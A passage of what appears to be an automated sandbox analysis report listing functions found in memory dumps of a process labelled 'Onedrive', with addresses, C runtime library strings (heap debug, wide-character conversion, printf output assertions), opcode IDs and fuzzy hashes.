                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __vcrt_lock$CriticalEnterSection
                                                    • String ID: %ls$7$_CrtSetDbgFlag$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$new_bits == _CRTDBG_REPORT_FLAG || new_bits_have_only_valid_flags
                                                    • API String ID: 3216741998-3531600671
                                                    • Opcode ID: 98ef7632041a8fad0750eee4cc8ea17460eb30706e3ace5ef71840ebc1773ca3
                                                    • Instruction ID: 9b105078fd31bcebc54a5f98a4c559c9ba13bbe776f3da9c52de8aa98b4e9fa7
                                                    • Opcode Fuzzy Hash: 98ef7632041a8fad0750eee4cc8ea17460eb30706e3ace5ef71840ebc1773ca3
                                                    • Instruction Fuzzy Hash: 70415272B1C6428AE3509F26E465B6A7BA1EB81304F421235E5B95A6DDCF3DE584CF00
                                                    Function 00007FFDF3B0A580 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 373COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$_wcstombs_l_helper$minkernel\crts\ucrt\src\appcrt\convert\wcstombs.cpp$pwcs != nullptr
                                                    • API String ID: 0-287901994
                                                    • Opcode ID: 743646601bf834168527aa144c1fd2e5dc80d6afa19a0699e979b3519a2906be
                                                    • Instruction ID: 446074c7b8d37e9b39f8c1e553203c0cfadd4fa49067b4be396e9d1b5d473b51
                                                    • Opcode Fuzzy Hash: 743646601bf834168527aa144c1fd2e5dc80d6afa19a0699e979b3519a2906be
                                                    • Instruction Fuzzy Hash: 04121B7260CB8586D7708B16E4607AAB3A0F7847A4F554635EAED5BBE8DF3CD484CB00
                                                    Function 00007FFDF3AF4A70 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 260COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$("Buffer too small", 0)$_wctomb_internal$destination_count <= INT_MAX$destination_count > 0$minkernel\crts\ucrt\src\appcrt\convert\wctomb.cpp
                                                    • API String ID: 0-3614322479
                                                    • Opcode ID: 0f614ffcc1881ecedfdfa505c1d907f0ae2ecf116d141dd64fc1443b1e234b41
                                                    • Instruction ID: 43ec530a4db1c3ba098eeb76e529a64e2822fbc007ed79c075818acb403e18bf
                                                    • Opcode Fuzzy Hash: 0f614ffcc1881ecedfdfa505c1d907f0ae2ecf116d141dd64fc1443b1e234b41
                                                    • Instruction Fuzzy Hash: 12E13A32A0CBC285E7709B62E464BAAB3A0FB84754F514136D6AD5BADCDF7CD584CB00
                                                    Function 00007FFDF3ADD3D0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 239COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-3177598755
                                                    • Opcode ID: 2903877c41504ff71dd7ac0ce2aa557120b8f1187956e46286f88ae249a88ae2
                                                    • Instruction ID: 6a26365cccde72dc051e8d9c1777bc18d809fbd0a618eae551dbaf1d18e594d8
                                                    • Opcode Fuzzy Hash: 2903877c41504ff71dd7ac0ce2aa557120b8f1187956e46286f88ae249a88ae2
                                                    • Instruction Fuzzy Hash: D9C13B2271CAC185E7609B26E4607BAB761FBC5784F410032EAAE5BBDEDF2DD444CB50
                                                    Function 00007FFDF3ADE150 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 239COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-3177598755
                                                    • Opcode ID: 9fcc800b697e66e5a2e00d7e63b0316d99a108fc15282cfc1420a90e1ce9cbd0
                                                    • Instruction ID: 1be5ee827dce094934a844f93fd3717d33913848af4dce9c76f9be48ddca175d
                                                    • Opcode Fuzzy Hash: 9fcc800b697e66e5a2e00d7e63b0316d99a108fc15282cfc1420a90e1ce9cbd0
                                                    • Instruction Fuzzy Hash: 6EC12B3271CA8185EB609B26E460BBEB761FBC5780F511032EA9D5BBDEDF2DD4448B40
                                                    Function 00007FFDF3ADC650 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 239COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-3177598755
                                                    • Opcode ID: 8c2f7f8cf4eb60a7f862857748a541016eaa27abcc5c4df5f5fa1067a4d7720e
                                                    • Instruction ID: 7ea3bd65ebc6131daa3db80390e0ddf4fd9abb488b73e1a5e8b9cb351353b0f1
                                                    • Opcode Fuzzy Hash: 8c2f7f8cf4eb60a7f862857748a541016eaa27abcc5c4df5f5fa1067a4d7720e
                                                    • Instruction Fuzzy Hash: DFC12C2271CA8185E760DB26E060BBEB761FBC1780F511032EA9E5BBDEDF2DD4458B40
                                                    Function 00007FFDF3ADCAD0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 238COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-2041781485
                                                    • Opcode ID: 78b8b794c379b49e69a8979361e5dbb4b806ee50a32993ebf0ad29c2e8166d96
                                                    • Instruction ID: 6a72336cac73b8ea63d81f6af4b1956e49893bb2aff0facc60ef06f1978bf67c
                                                    • Opcode Fuzzy Hash: 78b8b794c379b49e69a8979361e5dbb4b806ee50a32993ebf0ad29c2e8166d96
                                                    • Instruction Fuzzy Hash: E0C13C2271DAC185E7609B26E4A07BAB761FBC5780F410032EADE5BBDECF2DD4458B40
                                                    Function 00007FFDF3ADC1D0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-1003573884
                                                    • Opcode ID: b4f3e4260ec6d7b3d90b938558def7c2c3ed8f015c38342de67e4952101a5583
                                                    • Instruction ID: f81847f03bf7ac346139df7159e49f72bca89681799e87acf67ca3b2942f9dcd
                                                    • Opcode Fuzzy Hash: b4f3e4260ec6d7b3d90b938558def7c2c3ed8f015c38342de67e4952101a5583
                                                    • Instruction Fuzzy Hash: 53C13D2271CAC185E7609B26E0A07BEB761FBC5780F511032EA9E5BBDEDF2DD4458B40
                                                    Function 00007FFDF3ADD850 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 238COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-2041781485
                                                    • Opcode ID: 912e2437d91deac4f330579838eef85cc56769922d80ecc1edd5ef1b8bc710e0
                                                    • Instruction ID: 5ccafd5435897fa15ff4896456fb7cadc2c94b4c0a69e2473090783fc28b4485
                                                    • Opcode Fuzzy Hash: 912e2437d91deac4f330579838eef85cc56769922d80ecc1edd5ef1b8bc710e0
                                                    • Instruction Fuzzy Hash: 60C13C2271CAC185E7609B26E46077EB761FBC5780F411032EAAE5BBEEDF2DD4448B50
                                                    Function 00007FFDF3ADCF50 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 238COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-1003573884
                                                    • Opcode ID: 308437765815ff5fef9f9c808688f9f617a22f9d268eaa4663d86ca56d1bbce6
                                                    • Instruction ID: 9ba8f77dedf15272d839d6e4e0f0b0c0ebc0d4c2a38fc674ad3d07a00a54e7f2
                                                    • Opcode Fuzzy Hash: 308437765815ff5fef9f9c808688f9f617a22f9d268eaa4663d86ca56d1bbce6
                                                    • Instruction Fuzzy Hash: 6FC13B2271CAC185E7609B26E4607BEB761FBC5780F410032EAAE5BBDECF2DD4458B50
                                                    Function 00007FFDF3ADBD50 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-2041781485
                                                    • Opcode ID: 469e38d6eed64a1a91316f730531ced8dac0510bf6a3972017723c6cfb3396b6
                                                    • Instruction ID: 9c259c0a43ab01c86fea6d5b11b5eb05df59950a05637f1b87198960276ddcec
                                                    • Opcode Fuzzy Hash: 469e38d6eed64a1a91316f730531ced8dac0510bf6a3972017723c6cfb3396b6
                                                    • Instruction Fuzzy Hash: 63C12C2271CAC185E7609B26E4A07BEB761FBC5780F411032EA9E5BBDEDF2DD4458B40
                                                    Function 00007FFDF3ADDCD0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 238COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-1003573884
                                                    • Opcode ID: b9c71c7ffbedc175137bab90b96f82f8f806c00a84a48dc1ea6ce4bedb3eed6c
                                                    • Instruction ID: 1816620f485bf5609909c8cb62bf3ba3e6fb34a6ce36b3e5daee7decb64d0932
                                                    • Opcode Fuzzy Hash: b9c71c7ffbedc175137bab90b96f82f8f806c00a84a48dc1ea6ce4bedb3eed6c
                                                    • Instruction Fuzzy Hash: F1C12E2271DAC185E7609B26E4607BAB761EBC5780F410032EAEE5BBDEDF2DD444CB50
                                                    Function 00007FFDF3AD9C50 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 233COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_
                                                    • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                                                    • API String ID: 2780765137-3439959449
                                                    • Opcode ID: 8fc302a938c663c038e340c4baeda506e803461af4fb7fee05b98ac1756c9dc9
                                                    • Instruction ID: f86399810837e7f0ad329960fa2b538389f8bdd32b1f411ff0f321e349281561
                                                    • Opcode Fuzzy Hash: 8fc302a938c663c038e340c4baeda506e803461af4fb7fee05b98ac1756c9dc9
                                                    • Instruction Fuzzy Hash: DFC1292260CB8586EB708B16F8647AAB3A0FB84744F511135E6AD9ABDDEF7CD544CF00
                                                    Function 00007FFDF3ADA110 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 229COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_
                                                    • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                                                    • API String ID: 2780765137-3439959449
                                                    • Opcode ID: c1ee4b9d8667413ed4f81e61ef1550aac306862adbeed06d7b0a525d6e872b36
                                                    • Instruction ID: 48aa24f2816663970ca931bd1eaa8da709706bc8474bb78a2f970b0ff9d98cca
                                                    • Opcode Fuzzy Hash: c1ee4b9d8667413ed4f81e61ef1550aac306862adbeed06d7b0a525d6e872b36
                                                    • Instruction Fuzzy Hash: 54C13932A1DA8185E7708B16E8647ABB3A0FB84354F511135E6AD9BAECEF3CD544CF00
                                                    Function 00007FFDF3AE52C0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: get_int64_arg
                                                    • String ID: %ls$("'n' format specifier disabled", 0)$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 1967237116-2589718845
                                                    • Opcode ID: 1571fae24718bc4f499a30154422bbf6e6c706c7d3a6b255a949ed42d7060a54
                                                    • Instruction ID: bb95407d11c54183b9b7cc189283d3e4703dd6e11728e6f1ae6287560e57ef5d
                                                    • Opcode Fuzzy Hash: 1571fae24718bc4f499a30154422bbf6e6c706c7d3a6b255a949ed42d7060a54
                                                    • Instruction Fuzzy Hash: 19712B32B1CB4296E7609B17F470A6A77A1FB85784F510031EAAD5B7ECDE7DD4818B00
                                                    Function 00007FFDF3AE5030 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: get_int64_arg
                                                    • String ID: %ls$("'n' format specifier disabled", 0)$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 1967237116-3627661228
                                                    • Opcode ID: 6454f08fe2c758332c2d827023cd1bfa62773c42d17287b729fb28d338e575c5
                                                    • Instruction ID: d668ae24d931b302a91c9740e42971828c17467cb01066f6b9e10e3748034423
                                                    • Opcode Fuzzy Hash: 6454f08fe2c758332c2d827023cd1bfa62773c42d17287b729fb28d338e575c5
                                                    • Instruction Fuzzy Hash: BE711935B18B4286EB609B17F470A6A77A0FB85784F510035EA9D5B7E9DF3DD4818B00
                                                    Function 00007FFDF3AE5550 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: get_int64_arg
                                                    • String ID: %ls$("'n' format specifier disabled", 0)$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 1967237116-485287010
                                                    • Opcode ID: d356d4bb658979b681b4911ef5bf00e3ae0c0756d7d0f442ad72f8d187c081c4
                                                    • Instruction ID: 0076df5934620cd70838d6f36f03637b011402aca7938c8c7818b3f8cd73329e
                                                    • Opcode Fuzzy Hash: d356d4bb658979b681b4911ef5bf00e3ae0c0756d7d0f442ad72f8d187c081c4
                                                    • Instruction Fuzzy Hash: A7714A31B1CB42C6EB609B17F470A6A77A0FB86784F510435EAAD5B7E8DE3DD4818B00
                                                    Function 00007FFDF3B0B8B0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
